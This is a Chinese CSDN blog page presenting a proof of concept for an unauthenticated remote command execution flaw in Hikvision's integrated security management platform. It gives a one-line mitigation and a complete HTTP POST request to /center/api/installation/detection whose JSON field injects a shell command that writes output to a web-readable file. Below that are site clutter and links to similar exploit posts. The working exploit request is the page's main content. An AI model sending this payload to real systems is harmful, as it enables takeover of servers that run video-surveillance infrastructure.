【攻防演练】【含poc和修复建议】海康威视综合安防管理平台远程命令执行漏洞

8eeth0ven

于 2024-07-27 22:29:39 发布

阅读量576

点赞数 3

文章标签：网络安全漏洞复现

本文链接：https://blog.csdn.net/zzxx191z/article/details/140742531

版权

使用防护类设备进行防护，限制访问/center/api/installation/detection 路径，拦截请求中出现的恶意命令注入

POST /center/api/installation/detection HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac Os X 10 12_6)
AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i
mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=UTF-8
{"type":"environment","operate":"","machines":{"id": "$(id >/opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/echo.t
xt)"}}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

8eeth0ven

关注关注

3
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
【攻防演练】【含poc和修复建议】海康威视综合安防管理平台远程命令执行漏洞

使用防护类设备进行防护，限制访问/center/api/installation/detection 路径，拦截请求中出现的恶意命令注入。
复制链接

扫一扫

【1day】复现海康综合安防管理平台 applyCT Fastjson远程命令执行漏洞

记录并分享学习安全的知识点..

07-24

684

海康威视综合安防管理平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度，海康综合安防管理平台 applyCT 存在低版本Fastjson远程命令执行漏洞，攻击者通过漏洞可以执行任意命令获取服务器权限。

海康威视综合安防管理平台 detection 前台RCE漏洞复现

0xSec

07-22

3855

海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

参与评论您还未登录，请先登录后发表或查看评论

0day新接口-海康威视综合安防管理平台register命令执行漏洞

weixin_43167326的博客

06-06

689

海康威视部分综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、配置、管理和调度，可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。

1day海康威视综合安防管理平台多个RCE远程代码执行漏洞

weixin_43167326的博客

06-11

1095

0day海康威视综合安防管理平台 applyAutoLoginTicket 远程代码执行漏洞

weixin_43167326的博客

06-07

743

【漏洞复现】海康威视综合安防管理平台 iSecure Center applyCT fastjson 远程代码执行

siu~

05-21

1167

海康威视综合安防管理平台 `iSecure Center applyCT fastjson` 远程代码执行

1day海康威视综合安防管理平台 detection 前台RCE漏洞

weixin_43167326的博客

07-23

965

海康威视综合安防管理平台Fastjson远程命令执行漏洞

holyxp的博客

07-24

1943

综合安防管理平台基于 " 统一软件技术架构" 理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、配置、管理和调度。

Nday 海康综合安防管理平台存在多个漏洞、29个漏洞合集

weixin_43167326的博客

06-04

1136

海康威视综合安防管理平台存在Fastjson远程命令执行漏洞

nnn2188185的博客

04-26

944

海康威视综合安防管理平台存在Fastjson远程命令执行漏洞，该漏洞可执行系统命令，直接获取服务器权限。

apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具

04-21

检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt（把url按一行一个保存到file.txt中）结果有可能如下

CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC

09-02

WinRAR 拥有超过 500 亿用户，面临新漏洞（CVE-2023-40477、CVE-2023-38831）。今天，我们首次展示：CVE-2023-40477 的 PoC。尽管 RCE 被认为是可利用的，但由于多种原因，其在实现过程中看起来并不乐观。我们在...

CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC

08-25

CVE-2023-38831 漏洞位于ZIP文件的处理过程，攻击者可以制作恶意.ZIP或.RAR压缩文件，其中包含无害文件（例如.jpg、.txt或PDF文件等）及恶意执行文件，并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...

大华智慧园区综合管理平台存在未授权高危漏洞（0Day）及以往漏洞POC合集

02-27

大华智慧园区综合管理平台存在未授权高危漏洞（0Day）及以往漏洞POC合集

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8349

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar

07-26

大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar

b278视频及游戏管理平台-springboot+vue.zip（可运行源码+sql文件+）

07-26

视频及游戏管理平台是一个很好的项目，结合了后端（Spring Boot）和前端（Vue.js）技术，实现了前后端分离。视频及游戏管理平台是一个很好的项目，结合了后端（Spring Boot）和前端（Vue.js）技术，实现了前后端分离。视频及游戏管理平台是一个很好的项目，结合了后端（Spring Boot）和前端（Vue.js）技术，实现了前后端分离。视频及游戏管理平台是一个很好的项目，结合了后端（Spring Boot）和前端（Vue.js）技术，实现了前后端分离。视频及游戏管理平台是一个很好的项目，结合了后端（Spring Boot）和前端（Vue.js）技术，实现了前后端分离。视频及游戏管理平台是一个很好的项目，结合了后端（Spring Boot）和前端（Vue.js）技术，实现了前后端分离。

大模型应用-为Ollma开发的简单的HTML网页UI应用-附项目源码-优质项目实战.zip

【攻防演练】【含poc和修复建议】海康威视综合安防管理平台 远程命令执行漏洞

【攻防演练】【含poc和修复建议】海康威视综合安防管理平台远程命令执行漏洞